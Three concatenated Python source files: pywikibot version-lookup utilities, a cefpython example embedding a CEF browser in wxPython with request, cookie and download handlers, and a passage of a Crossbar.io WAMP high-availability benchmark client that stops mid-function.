path = _get_program_dir()
with open(os.path.join(path, 'version')) as data:
(tag, rev, date, hsh) = data.readlines()
date = time.strptime(date[:19], '%Y-%m-%dT%H:%M:%S')
if not date or not tag or not rev:
raise ParseError
return (tag, rev, date, hsh)
def getversion_package(path=None): # pylint: disable=unused-argument
"""Get version info for an installed package.
@param path: Unused argument
@return:
- tag: 'pywikibot/__init__.py'
- rev: '-1 (unknown)'
- date (date the package was installed locally),
- hash (git hash for the current revision of 'pywikibot/__init__.py')
@rtype: C{tuple} of four C{str}
"""
hsh = get_module_version(pywikibot)
date = get_module_mtime(pywikibot).timetuple()
tag = 'pywikibot/__init__.py'
rev = '-1 (unknown)'
return (tag, rev, date, hsh)
def getversion_onlinerepo(repo=None):
"""Retrieve current framework revision number from online repository.
@param repo: (optional) Online repository location
@type repo: URL or string
"""
from pywikibot.comms import http
url = repo or 'https://git.wikimedia.org/feed/pywikibot/core'
buf = http.fetch(uri=url,
headers={'user-agent': '{pwb}'}).content.splitlines()
try:
hsh = buf[13].split('/')[5][:-1]
return hsh
except Exception as e:
raise ParseError(repr(e) + ' while parsing ' + repr(buf))
@deprecated('get_module_version, get_module_filename and get_module_mtime')
def getfileversion(filename):
"""Retrieve revision number of file.
    The __version__ variable containing the Id tag is read and
    returned without importing the file, so the version can be
    retrieved from any file.
@param filename: Name of the file to get version
@type filename: string
"""
_program_dir = _get_program_dir()
__version__ = None
mtime = None
fn = os.path.join(_program_dir, filename)
if os.path.exists(fn):
with codecs.open(fn, 'r', "utf-8") as f:
for line in f.readlines():
if line.find('__version__') == 0:
try:
exec(line)
except:
pass
break
stat = os.stat(fn)
mtime = datetime.datetime.fromtimestamp(stat.st_mtime).isoformat(' ')
if mtime and __version__:
return u'%s %s %s' % (filename, __version__[5:-1][:7], mtime)
else:
return None
def get_module_version(module):
"""
Retrieve __version__ variable from an imported module.
@param module: The module instance.
@type module: module
@return: The version hash without the surrounding text. If not present None.
@rtype: str or None
"""
if hasattr(module, '__version__'):
return module.__version__[5:-1]
def get_module_filename(module):
"""
Retrieve filename from an imported pywikibot module.
    It uses the __file__ attribute of the module. If its file extension
    ends with 'py' plus one more character (e.g. '.pyc'), the last
    character is discarded when the corresponding .py file exists.
@param module: The module instance.
@type module: module
@return: The filename if it's a pywikibot module otherwise None.
@rtype: str or None
"""
if hasattr(module, '__file__') and os.path.exists(module.__file__):
filename = module.__file__
if filename[-4:-1] == '.py' and os.path.exists(filename[:-1]):
filename = filename[:-1]
program_dir = _get_program_dir()
if filename[:len(program_dir)] == program_dir:
return filename
def get_module_mtime(module):
"""
Retrieve the modification time from an imported module.
@param module: The module instance.
@type module: module
@return: The modification time if it's a pywikibot module otherwise None.
@rtype: datetime or None
"""
filename = get_module_filename(module)
if filename:
return datetime.datetime.fromtimestamp(os.stat(filename).st_mtime)
def package_versions(modules=None, builtins=False, standard_lib=None):
"""Retrieve package version information.
When builtins or standard_lib are None, they will be included only
if a version was found in the package.
@param modules: Modules to inspect
@type modules: list of strings
@param builtins: Include builtins
@type builtins: Boolean, or None for automatic selection
@param standard_lib: Include standard library packages
@type standard_lib: Boolean, or None for automatic selection
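    A minimal usage sketch (the module names are illustrative):
        versions = package_versions(['netaddr', 'os'])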
"""
if not modules:
modules = sys.modules.keys()
import distutils.sysconfig
std_lib_dir = distutils.sysconfig.get_python_lib(standard_lib=True)
root_packages = set([key.split('.')[0]
for key in modules])
builtin_packages = set([name.split('.')[0] for name in root_packages
if name in sys.builtin_module_names or
'_' + name in sys.builtin_module_names])
# Improve performance by removing builtins from the list if possible.
if builtins is False:
root_packages = list(root_packages - builtin_packages)
std_lib_packages = []
paths = {}
data = {}
for name in root_packages:
try:
package = __import__(name, level=0)
except Exception as e:
data[name] = {'name': name, 'err': e}
continue
info = {'package': package, 'name': name}
if name in builtin_packages:
info['type'] = 'builtins'
if '__file__' in package.__dict__:
# Determine if this file part is of the standard library.
if os.path.normcase(package.__file__).startswith(
os.path.normcase(std_lib_dir)):
std_lib_packages.append(name)
if standard_lib is False:
continue
                info['type'] = 'standard library'
# Strip '__init__.py' from the filename.
path = package.__file__
if '__init__.py' in path:
path = path[0:path.index('__init__.py')]
if PY2:
path = path.decode(sys.getfilesystemencoding())
info['path'] = path
assert path not in paths, 'Path of the package is in defined paths'
paths[path] = name
if '__version__' in package.__dict__:
info['ver'] = package.__version__
elif name == 'mwlib': # mwlib 0.14.3 does not include a __init__.py
module = __import__(name + '._version',
fromlist=['_version'], level=0)
if '__version__' in module.__dict__:
info['ver'] = module.__version__
path = module.__file__
path = path[0:path.index('_version.')]
info['path'] = path
# If builtins or standard_lib is None,
# only include package if a version was found.
if (builtins is None and name in builtin_packages) or \
(standard_lib is None and name in std_lib_packages):
if 'ver' in info:
data[name] = info
else:
                # Remove the entry from paths, so it isn't processed below
del paths[info['path']]
else:
data[name] = info
# Remove any pywikibot sub-modules which were loaded as a package.
# e.g. 'wikipedia_family.py' is loaded as 'wikipedia'
_program_dir = _get_program_dir()
for path, name in paths.items():
if _program_dir in path:
del data[name]
return data
|
|
# An example of embedding CEF browser in wxPython on Linux.
import ctypes, os, sys
libcef_so = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'libcef.so')
if os.path.exists(libcef_so):
# Import local module
ctypes.CDLL(libcef_so, ctypes.RTLD_GLOBAL)
if 0x02070000 <= sys.hexversion < 0x03000000:
import cefpython_py27 as cefpython
else:
raise Exception("Unsupported python version: %s" % sys.version)
else:
# Import from package
from cefpython1 import cefpython
import wx
import time
import re
import uuid
# Which method to use for message loop processing.
# EVT_IDLE - wx application has priority (default)
# EVT_TIMER - cef browser has priority
# It seems that Flash content behaves better when using a timer.
# IMPORTANT! On Linux EVT_IDLE does not work; the events seem to
# be propagated only when you move your mouse, which is not the
# expected behavior. It is recommended to use EVT_TIMER on Linux,
# so set this value to False.
USE_EVT_IDLE = False
def GetApplicationPath(file=None):
import re, os, platform
# If file is None return current directory without trailing slash.
if file is None:
file = ""
# Only when relative path.
if not file.startswith("/") and not file.startswith("\\") and (
not re.search(r"^[\w-]+:", file)):
if hasattr(sys, "frozen"):
path = os.path.dirname(sys.executable)
elif "__file__" in globals():
path = os.path.dirname(os.path.realpath(__file__))
else:
path = os.getcwd()
path = path + os.sep + file
if platform.system() == "Windows":
path = re.sub(r"[/\\]+", re.escape(os.sep), path)
path = re.sub(r"[/\\]+$", "", path)
return path
return str(file)
def ExceptHook(type, value, traceObject):
import traceback, os, time
# This hook does the following: in case of exception display it,
# write to error.log, shutdown CEF and exit application.
error = "\n".join(traceback.format_exception(type, value, traceObject))
error_file = GetApplicationPath("error.log")
try:
with open(error_file, "a") as file:
file.write("\n[%s] %s\n" % (time.strftime("%Y-%m-%d %H:%M:%S"), error))
except:
# If this is an example run from
# /usr/local/lib/python2.7/dist-packages/cefpython1/examples/
# then we might have not permission to write to that directory.
print("cefpython: WARNING: failed writing to error file: %s" % (
error_file))
print("\n"+error+"\n")
cefpython.QuitMessageLoop()
cefpython.Shutdown()
# So that "finally" does not execute.
os._exit(1)
class MainFrame(wx.Frame):
browser = None
initialized = False
idleCount = 0
box = None
def __init__(self):
wx.Frame.__init__(self, parent=None, id=wx.ID_ANY,
title='wxPython example', size=(800,600))
self.CreateMenu()
windowInfo = cefpython.WindowInfo()
windowInfo.SetAsChild(self.GetGtkWidget())
        # Linux requires adding "file://" for local files,
        # otherwise /home/some would be treated as http://home/some
self.browser = cefpython.CreateBrowserSync(
windowInfo,
            # Flash will crash the app in CEF 1 on Linux, so set
            # plugins_disabled to True.
browserSettings={"plugins_disabled": True},
navigateUrl="file://"+GetApplicationPath("wxpython.html"))
self.browser.SetClientHandler(ClientHandler())
jsBindings = cefpython.JavascriptBindings(
bindToFrames=False, bindToPopups=False)
jsBindings.SetObject("external", JavascriptBindings(self.browser))
self.browser.SetJavascriptBindings(jsBindings)
self.Bind(wx.EVT_CLOSE, self.OnClose)
if USE_EVT_IDLE:
# Bind EVT_IDLE only for the main application frame.
self.Bind(wx.EVT_IDLE, self.OnIdle)
def CreateMenu(self):
filemenu = wx.Menu()
filemenu.Append(1, "Open")
filemenu.Append(2, "Exit")
aboutmenu = wx.Menu()
aboutmenu.Append(1, "CEF Python")
menubar = wx.MenuBar()
menubar.Append(filemenu,"&File")
menubar.Append(aboutmenu, "&About")
self.SetMenuBar(menubar)
def OnClose(self, event):
self.browser.CloseBrowser()
self.Destroy()
def OnIdle(self, event):
# self.idleCount += 1
# print("wxpython.py: OnIdle() %d" % self.idleCount)
cefpython.MessageLoopWork()
class JavascriptBindings:
mainBrowser = None
webRequest = None
webRequestId = 0
cookieVisitor = None
def __init__(self, mainBrowser):
self.mainBrowser = mainBrowser
def WebRequest(self, url):
request = cefpython.Request.CreateRequest()
request.SetUrl(url)
webRequestClient = WebRequestClient()
# Must keep the reference otherwise WebRequestClient
# callbacks won't be called.
self.webRequest = cefpython.WebRequest.CreateWebRequest(request,
webRequestClient)
def DoCallFunction(self):
self.mainBrowser.GetMainFrame().CallFunction(
"MyFunction", "abc", 12, [1,2,3], {"qwe": 456, "rty": 789})
def VisitAllCookies(self):
# Need to keep the reference alive.
self.cookieVisitor = CookieVisitor()
cookieManager = self.mainBrowser.GetUserData("cookieManager")
if not cookieManager:
print("\nCookie manager not yet created! Visit http website first")
return
cookieManager.VisitAllCookies(self.cookieVisitor)
def VisitUrlCookies(self):
# Need to keep the reference alive.
self.cookieVisitor = CookieVisitor()
cookieManager = self.mainBrowser.GetUserData("cookieManager")
if not cookieManager:
print("\nCookie manager not yet created! Visit http website first")
return
cookieManager.VisitUrlCookies(
"http://www.html-kit.com/tools/cookietester/",
False, self.cookieVisitor)
# .www.html-kit.com
def SetCookie(self):
cookieManager = self.mainBrowser.GetUserData("cookieManager")
if not cookieManager:
print("\nCookie manager not yet created! Visit http website first")
return
cookie = cefpython.Cookie()
cookie.SetName("Created_Via_Python")
cookie.SetValue("yeah really")
cookieManager.SetCookie("http://www.html-kit.com/tools/cookietester/",
cookie)
print("\nCookie created! Visit html-kit cookietester to see it")
def DeleteCookies(self):
cookieManager = self.mainBrowser.GetUserData("cookieManager")
if not cookieManager:
print("\nCookie manager not yet created! Visit http website first")
return
cookieManager.DeleteCookies(
"http://www.html-kit.com/tools/cookietester/",
"Created_Via_Python")
print("\nCookie deleted! Visit html-kit cookietester to see the result")
class CookieVisitor:
def Visit(self, cookie, count, total, deleteCookie):
if count == 0:
print("\nCookieVisitor.Visit(): total cookies: %s" % total)
print("\nCookieVisitor.Visit(): cookie:")
print(cookie.Get())
# True to continue visiting cookies
return True
class WebRequestClient:
def OnStateChange(self, webRequest, state):
stateName = "unknown"
for key, value in cefpython.WebRequest.State.iteritems():
if value == state:
stateName = key
print("\nWebRequestClient::OnStateChange(): state = %s" % stateName)
def OnRedirect(self, webRequest, request, response):
print("\nWebRequestClient::OnRedirect(): url = %s" % (
request.GetUrl()[:80]))
def OnHeadersReceived(self, webRequest, response):
print("\nWebRequestClient::OnHeadersReceived(): headers = %s" % (
response.GetHeaderMap()))
def OnProgress(self, webRequest, bytesSent, totalBytesToBeSent):
print("\nWebRequestClient::OnProgress(): bytesSent = %s, "
"totalBytesToBeSent = %s" % (bytesSent, totalBytesToBeSent))
def OnData(self, webRequest, data):
print("\nWebRequestClient::OnData(): data:")
print("-" * 60)
print(data)
print("-" * 60)
def OnError(self, webRequest, errorCode):
print("\nWebRequestClient::OnError(): errorCode = %s" % errorCode)
class ContentFilterHandler:
def OnData(self, data, substitute_data):
if data == "body { color: red; }":
substitute_data.SetData("body { color: green; }")
def OnDrain(self, remainder):
remainder.SetData("body h3 { color: orange; }")
class ClientHandler:
# --------------------------------------------------------------------------
# RequestHandler
# --------------------------------------------------------------------------
contentFilter = None
def OnBeforeBrowse(self, browser, frame, request, navType, isRedirect):
# - frame.GetUrl() returns current url
# - request.GetUrl() returns new url
# - Return true to cancel the navigation or false to allow
# the navigation to proceed.
# - Modifying headers or post data can be done only in
# OnBeforeResourceLoad()
print("\nOnBeforeBrowse(): request.GetUrl() = %s, "
"request.GetHeaderMap(): %s" % (
request.GetUrl()[:80], request.GetHeaderMap()))
if request.GetMethod() == "POST":
print("\nOnBeforeBrowse(): POST data: %s" % (
request.GetPostData()))
def OnBeforeResourceLoad(self, browser, request, redirectUrl,
streamReader, response, loadFlags):
print("\nOnBeforeResourceLoad(): request.GetUrl() = %s" % (
request.GetUrl()[:80]))
if request.GetMethod() == "POST":
if request.GetUrl().startswith(
"https://accounts.google.com/ServiceLogin"):
postData = request.GetPostData()
postData["Email"] = "--changed via python"
request.SetPostData(postData)
print("\nOnBeforeResourceLoad(): modified POST data: %s" % (
request.GetPostData()))
if request.GetUrl().endswith("replace-on-the-fly.css"):
print("\nOnBeforeResourceLoad(): replacing css on the fly")
response.SetStatus(200)
response.SetStatusText("OK")
response.SetMimeType("text/css")
streamReader.SetData("body { color: red; }")
def OnResourceRedirect(self, browser, oldUrl, newUrl):
print("\nOnResourceRedirect(): oldUrl: %s, newUrl: %s" % (
oldUrl, newUrl[0]))
def OnResourceResponse(self, browser, url, response, contentFilter):
print("\nOnResourceResponse(): url = %s, headers = %s" % (
url[:80], response.GetHeaderMap()))
if url.endswith("content-filter/replace-on-the-fly.css"):
print("\nOnResourceResponse(): setting contentFilter handler")
contentFilter.SetHandler(ContentFilterHandler())
# Must keep the reference to contentFilter otherwise
# ContentFilterHandler callbacks won't be called.
self.contentFilter = contentFilter
def GetCookieManager(self, browser, mainUrl):
# Create unique cookie manager for each browser.
cookieManager = browser.GetUserData("cookieManager")
if cookieManager:
return cookieManager
else:
cookieManager = cefpython.CookieManager.CreateManager("")
browser.SetUserData("cookieManager", cookieManager)
return cookieManager
# --------------------------------------------------------------------------
# DragHandler
# --------------------------------------------------------------------------
def OnDragStart(self, browser, dragData, mask):
maskNames = ""
for key, value in cefpython.Drag.Operation.iteritems():
if value and (value & mask) == value:
maskNames += " "+key
print("\nOnDragStart(): mask=%s" % maskNames)
print(" IsLink(): %s" % dragData.IsLink())
print(" IsFragment(): %s" % dragData.IsFragment())
print(" IsFile(): %s" % dragData.IsFile())
print(" GetLinkUrl(): %s" % dragData.GetLinkUrl())
print(" GetLinkTitle(): %s" % dragData.GetLinkTitle())
print(" GetLinkMetadata(): %s" % dragData.GetLinkMetadata())
print(" GetFragmentText(): %s" % dragData.GetFragmentText())
print(" GetFragmentHtml(): %s" % dragData.GetFragmentHtml())
print(" GetFragmentBaseUrl(): %s" % dragData.GetFragmentBaseUrl())
print(" GetFile(): %s" % dragData.GetFile())
print(" GetFiles(): %s" % dragData.GetFiles())
# Returning True on Linux causes segmentation fault,
# reported the bug here:
# http://www.magpcss.org/ceforum/viewtopic.php?f=6&t=10693
# Not being able to cancel a drag event is a problem
# only when a link or a folder is dragged, as this will
# cause loading the link or the folder in the browser window.
# When dragging text/html or a file it is not a problem, as
# it does not lead to browser navigating.
return False
def OnDragEnter(self, browser, dragData, mask):
maskNames = ""
for key, value in cefpython.Drag.Operation.iteritems():
if value and (value & mask) == value:
maskNames += " "+key
print("\nOnDragEnter(): mask=%s" % maskNames)
print(" IsLink(): %s" % dragData.IsLink())
print(" IsFragment(): %s" % dragData.IsFragment())
print(" IsFile(): %s" % dragData.IsFile())
print(" GetLinkUrl(): %s" % dragData.GetLinkUrl())
print(" GetLinkTitle(): %s" % dragData.GetLinkTitle())
print(" GetLinkMetadata(): %s" % dragData.GetLinkMetadata())
print(" GetFragmentText(): %s" % dragData.GetFragmentText())
print(" GetFragmentHtml(): %s" % dragData.GetFragmentHtml())
print(" GetFragmentBaseUrl(): %s" % dragData.GetFragmentBaseUrl())
print(" GetFile(): %s" % dragData.GetFile())
print(" GetFiles(): %s" % dragData.GetFiles())
# Returning True on Linux causes segmentation fault,
# reported the bug here:
# http://www.magpcss.org/ceforum/viewtopic.php?f=6&t=10693
# Not being able to cancel a drag event is a problem
# only when a link or a folder is dragged, as this will
# cause loading the link or the folder in the browser window.
# When dragging text/html or a file it is not a problem, as
# it does not lead to browser navigating.
return False
# --------------------------------------------------------------------------
# DownloadHandler
# --------------------------------------------------------------------------
downloadHandler = None
def GetDownloadHandler(self, browser, mimeType, filename, contentLength):
# Close the browser window if it is a popup with
# no other document contents.
if browser.IsPopup() and not browser.HasDocument():
browser.CloseBrowser()
# The reference to DownloadHandler must be kept alive
# while download proceeds.
if self.downloadHandler and self.downloadHandler.downloading:
print("\nDownload is already in progress")
return False
self.downloadHandler = DownloadHandler(mimeType, filename,
contentLength)
return self.downloadHandler
class DownloadHandler:
mimeType = ""
filename = ""
contentLength = -1 # -1 means that file size was not provided.
fp = None
downloadsDir = "./downloads"
alreadyDownloaded = 0
downloading = False
def __init__(self, mimeType, filename, contentLength):
self.downloading = True
if not os.path.exists(self.downloadsDir):
os.mkdir(self.downloadsDir)
filename = filename.strip()
if not len(filename):
filename = self.GetUniqueFilename()
filename = self.GetSafeFilename(filename)
print("\nDownloadHandler() created")
print("mimeType: %s" % mimeType)
print("filename: %s" % filename)
print("contentLength: %s" % contentLength)
# Append ".downloading" to the filename, in OnComplete()
# when download finishes get rid of this extension.
filename += ".downloading"
if os.path.exists(self.downloadsDir+"/"+filename):
# If the last download did not succeed, the
# "xxx.downloading" might still be there.
os.remove(self.downloadsDir+"/"+filename)
self.mimeType = mimeType
self.filename = filename
self.contentLength = contentLength
self.fp = open(self.downloadsDir+"/"+filename, "wb")
def GetSafeFilename(self, filename):
if os.path.exists(self.downloadsDir+"/"+filename):
filename = self.GetUniqueFilename()[:4]+"_"+filename
assert not os.path.exists(self.downloadsDir+"/"+filename), (
"File aready exists")
return filename
def GetUniqueFilename(self):
# The filename may be empty, in that case generate
        # a unique name.
return str(uuid.uuid4()).replace("-", "")[:16]
def OnData(self, data):
if self.alreadyDownloaded == 0:
sys.stdout.write("Download progress: ")
sys.stdout.write(".")
sys.stdout.flush()
self.alreadyDownloaded += len(data)
self.fp.write(data)
# time.sleep(1) # Let's make the progress a bit slower (if cached)
# Return True to continue receiving data, False to cancel.
return True
def OnComplete(self):
sys.stdout.write("\n")
sys.stdout.flush()
self.fp.close()
        currentFile = self.downloadsDir+"/"+self.filename
        newFilename = re.sub(".downloading$", "", self.filename)
        os.rename(currentFile, self.downloadsDir+"/"+newFilename)
self.downloading = False
print("\nDownload complete!")
print("Total downloaded: %s" % self.PrettyBytes(
self.alreadyDownloaded))
print("See the 'downloads' directory.")
def PrettyBytes(self, bytes):
KiB = 1024
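        # e.g. 2048 bytes -> "2 KiB"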
return "%.3g KiB" % (bytes / KiB)
class MyApp(wx.App):
timer = None
timerID = 1
timerCount = 0
def OnInit(self):
if not USE_EVT_IDLE:
self.CreateTimer()
frame = MainFrame()
self.SetTopWindow(frame)
frame.Show()
return True
def CreateTimer(self):
# See "Making a render loop":
# http://wiki.wxwidgets.org/Making_a_render_loop
# Another approach is to use EVT_IDLE in MainFrame,
# see which one fits you better.
self.timer = wx.Timer(self, self.timerID)
self.timer.Start(10) # 10ms
wx.EVT_TIMER(self, self.timerID, self.OnTimer)
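    # For reference, the EVT_IDLE alternative mentioned above could look
    # roughly like this (a sketch only; it assumes MainFrame binds
    # self.Bind(wx.EVT_IDLE, self.OnIdle) when USE_EVT_IDLE is True):
    #
    #     def OnIdle(self, event):
    #         cefpython.MessageLoopWork()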
def OnTimer(self, event):
self.timerCount += 1
# print("wxpython.py: OnTimer() %d" % self.timerCount)
cefpython.MessageLoopWork()
def OnExit(self):
# When app.MainLoop() returns, MessageLoopWork() should
# not be called anymore.
if not USE_EVT_IDLE:
self.timer.Stop()
if __name__ == '__main__':
sys.excepthook = ExceptHook
cefpython.g_debug = True
cefpython.g_debugFile = GetApplicationPath("debug.log")
settings = {
"log_severity": cefpython.LOGSEVERITY_INFO,
"log_file": GetApplicationPath("debug.log"),
"release_dcheck_enabled": True, # Enable only when debugging.
        # These directories must be set on Linux
"locales_dir_path": cefpython.GetModuleDirectory()+"/locales",
"resources_dir_path": cefpython.GetModuleDirectory()
}
cefpython.Initialize(settings)
print('wx.version=%s' % wx.version())
app = MyApp(False)
app.MainLoop()
# Let wx.App destructor do the cleanup before calling cefpython.Shutdown().
del app
cefpython.Shutdown()
|
|
###############################################################################
#
# The MIT License (MIT)
#
# Copyright (c) Crossbar.io Technologies GmbH
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
#
###############################################################################
import sys
import copy
import uuid
import os
import argparse
import hashlib
import binascii
import configparser
from pprint import pprint
import txaio
from zlmdb import time_ns
from twisted.internet.defer import inlineCallbacks, gatherResults
from twisted.internet.task import LoopingCall, react
from autobahn.wamp.exception import TransportLost
from autobahn.twisted.util import sleep
from autobahn.twisted.wamp import ApplicationSession, ApplicationRunner
from autobahn.wamp.types import SubscribeOptions, PublishOptions, RegisterOptions, CallOptions
from crossbar.common.processinfo import ProcessInfo
from crossbar._util import hl
class HATestClientSession(ApplicationSession):
TEST_TOPIC = 'com.example.test1.binary'
TEST_PROC = 'com.example.proc1.binary'
log = txaio.make_logger()
def proc1(self, logname, url, loop, counter, payload, details=None):
fingerprint = hashlib.sha256(payload).digest()[:6]
self.log.info(
'{logprefix}: INVOCATION received on pid={pid} from {sender} -> loop={loop}, counter={counter}, len={payload_len}, fp={fp}, caller={caller}, caller_authid={caller_authid}, caller_authrole={caller_authrole}, forward_for={forward_for}',
logprefix=hl('WAMP {}:{}'.format(self._url, self._logname), color='blue', bold=True),
pid=hl(self._pid, color='blue', bold=True),
sender=hl('{}:{}'.format(url, logname), color='blue', bold=True),
loop=loop,
counter=counter,
procedure=details.procedure,
payload_len=len(payload),
fp=hl(binascii.b2a_hex(fingerprint).decode(), color='blue', bold=True),
caller=hl(details.caller, color='blue', bold=True),
caller_authid=hl(details.caller_authid, color='blue', bold=True),
caller_authrole=hl(details.caller_authrole, color='blue', bold=True),
forward_for=details.forward_for)
self._received_calls_cnt += 1
self._received_calls_bytes += len(payload)
if details.forward_for:
self._received_calls_ff_cnt += 1
return fingerprint, self._pid, self._logname, self._url
def on_event1(self, logname, url, loop, counter, payload, details=None):
fingerprint = hashlib.sha256(payload).digest()[:6]
        self.log.debug('{logprefix}: EVENT received from {sender} -> loop={loop}, counter={counter}, len={payload_len}, fp={fp}, publisher={publisher}, publisher_authid={publisher_authid}, publisher_authrole={publisher_authrole}, forward_for={forward_for}',
logprefix=hl('WAMP {}:{}'.format(self._url, self._logname), color='blue', bold=True),
sender=hl('{}:{}'.format(url, logname), color='blue', bold=True),
loop=loop,
counter=counter,
topic=details.topic,
payload_len=len(payload),
fp=hl(binascii.b2a_hex(fingerprint).decode(), color='blue', bold=True),
publisher=hl(details.publisher, color='blue', bold=True),
publisher_authid=hl(details.publisher_authid, color='blue', bold=True),
publisher_authrole=hl(details.publisher_authrole, color='blue', bold=True),
forward_for=details.forward_for)
self._received_cnt += 1
self._received_bytes += len(payload)
if details.forward_for:
self._received_ff_cnt += 1
@inlineCallbacks
def onJoin(self, details):
self._pid = os.getpid()
# benchmark parametrization:
self._period = self.config.extra.get('period', 10)
self._loops = self.config.extra.get('loops', 1)
self._rate = self.config.extra.get('rate', 1)
self._stride = self.config.extra.get('stride', 1)
self._size = self.config.extra.get('size', 256)
self._logname = self.config.extra.get('logname', None)
self._url = self.config.extra.get('url', None)
self._silent = self.config.extra.get('silent', False)
self._batch_id = uuid.uuid4()
self._running = True
self._pinfo = ProcessInfo()
# run-time session statistics for EVENTs
self._received_cnt = 0
self._received_bytes = 0
self._received_ff_cnt = 0
self._published_cnt = 0
self._published_bytes = 0
# run-time session statistics for CALLs
self._received_calls_cnt = 0
self._received_calls_bytes = 0
self._received_calls_ff_cnt = 0
self._calls_cnt = 0
self._calls_bytes = 0
self.log.info('{logname} connected [batch="{batch_id}"]: {details}',
logname=self._logname, batch_id=hl(self._batch_id), details=details)
self._last_stats = None
self._stats_loop = None
if self._silent:
self._stats(self._batch_id, self.log.info)
stats_period = 10.
if stats_period:
self._stats_loop = LoopingCall(self._stats, self._batch_id, self.log.info)
self._stats_loop.start(stats_period)
yield self.subscribe(self.on_event1,
HATestClientSession.TEST_TOPIC,
options=SubscribeOptions(match='exact', details=True))
for i in range(self._loops):
self._sender_loop('{}.{}'.format(self._logname, i))
self.log.info('{logname} ready [period={period}, loops={loops}, rate={rate}, stride={stride}, size={size}]',
logname=self._logname, period=self._period, loops=self._loops, rate=self._rate,
stride=self._stride, size=self._size)
def onLeave(self, details):
self.log.info('{logname} leaving: reason="{reason}"', logname=self._logname, reason=details.reason)
self._running = False
if self._silent:
self._stats(self._batch_id, self.log.warn)
if self._stats_loop:
self._stats_loop.stop()
self._stats_loop = None
@inlineCallbacks
def _sender_loop(self, loopname, enable_publish=True, enable_call=True):
loop = 0
while self._running:
started = time_ns()
dl = []
for counter in range(self._stride):
payload = os.urandom(self._size)
fingerprint = hashlib.sha256(payload).digest()[:6]
if enable_publish:
d = self.publish(HATestClientSession.TEST_TOPIC,
self._logname,
self._url,
loop,
counter,
payload,
options=PublishOptions(acknowledge=True, exclude_me=False))
dl.append(d)
self._published_cnt += 1
self._published_bytes += len(payload)
self.log.debug(
'{logprefix}: EVENT sent from session={session}, authid={authid}, authrole={authrole} -> loop={loop}, counter={counter}, len={payload_len}, fp={fp}',
logprefix=hl('WAMP {}:{}'.format(self._url, self._logname), color='green', bold=True),
session=hl(self._session_id, color='green', bold=True),
authid=hl(self._authid, color='green', bold=True),
authrole=hl(self._authrole, color='green', bold=True),
loop=loop,
counter=counter,
topic=HATestClientSession.TEST_TOPIC,
payload_len=len(payload),
fp=hl(binascii.b2a_hex(fingerprint).decode(), color='green', bold=True))
if enable_call:
for uri in ['node{}.container1.proc1'.format(i + 1) for i in range(4)]:
d = self.call(uri,
self._logname,
self._url,
loop,
counter,
payload,
options=CallOptions(details=True))
                        # pass uri and fingerprint explicitly so the callback
                        # does not see a later loop iteration's values
                        def check_result(result, uri, fingerprint):
print('-' * 100, result)
_fingerprint, _pid, _logname, _url = result.results[0]
self.log.info('{logprefix}: CALL RESULT for {uri} received from pid={pid}, logname={logname}, url={url}, callee={callee}, callee_authid={callee_authid}, callee_authrole={callee_authrole}, forward_for={forward_for}, fp={fp} => fp_equal={fp_equal}',
logprefix=hl('WAMP {}:{}'.format(self._url, self._logname), color='green',
bold=True),
pid=hl(_pid, color='green', bold=True),
logname=_logname,
url=_url,
fp=hl(binascii.b2a_hex(fingerprint).decode(), color='green', bold=True),
fp_equal=(_fingerprint == fingerprint),
uri=hl(uri, color='yellow', bold=True),
callee=result.callee,
callee_authid=result.callee_authid,
callee_authrole=result.callee_authrole,
forward_for=result.forward_for)
assert _fingerprint == fingerprint
def error(err):
print(err)
                        d.addCallbacks(check_result, error, (uri, fingerprint))
dl.append(d)
self._calls_cnt += 1
self._calls_bytes += len(payload)
self.log.info(
'{logprefix}: CALL issued to {uri} from pid={pid}, session={session}, authid={authid}, authrole={authrole} -> loop={loop}, counter={counter}, len={payload_len}, fp={fp}',
logprefix=hl('WAMP {}:{}'.format(self._url, self._logname), color='green', bold=True),
pid=hl(self._pid, color='green', bold=True),
session=hl(self._session_id, color='green', bold=True),
authid=hl(self._authid, color='green', bold=True),
authrole=hl(self._authrole, color='green', bold=True),
uri=hl(uri, color='yellow', bold=True),
loop=loop,
counter=counter,
procedure=HATestClientSession.TEST_PROC,
payload_len=len(payload),
fp=hl(binascii.b2a_hex(fingerprint).decode(), color='green', bold=True))
d = gatherResults(dl)
try:
yield d
except TransportLost:
self.log.error('Transport lost!')
self.leave()
return
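            # pace the loop to the nominal rate: each iteration should take
            # 1/rate seconds, so sleep off whatever time remains after the work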
duration = (time_ns() - started) / 10**9
sleep_secs = (1 / float(self._rate)) - duration
if sleep_secs > 0:
yield sleep(sleep_secs)
loop += 1
def _stats(self, batch_id, log):
stats = self._pinfo.get_stats()
if self._last_stats:
batch_duration = (stats['time'] - self._last_stats['time']) / 10 ** 9
ctx = round((stats['voluntary'] - self._last_stats['voluntary']) / batch_duration, 0)
log('{logprefix}: {user} user, {system} system, {mem_percent} mem_percent, {ctx} ctx',
logprefix=hl('LOAD', color='white', bold=True),
user=stats['user'],
system=stats['system'],
mem_percent=round(stats['mem_percent'], 1),
ctx=ctx)
events_received_per_sec = int(round(self._received_cnt / batch_duration))
bytes_received_per_sec = int(round(self._received_bytes / batch_duration))
events_published_per_sec = int(round(self._published_cnt / batch_duration))
bytes_published_per_sec = int(round(self._published_bytes / batch_duration))
log('{logprefix}: {events_received} EVENTs received ({events_received_ff} forwarded), {events_received_per_sec}, {events_published} events published, {events_published_per_sec} events/second',
logprefix=hl('WAMP {}.*'.format(self._logname), color='white', bold=True),
events_received=self._received_cnt,
events_received_ff=self._received_ff_cnt,
events_received_per_sec=hl('{} events/second'.format(events_received_per_sec), color='white', bold=True),
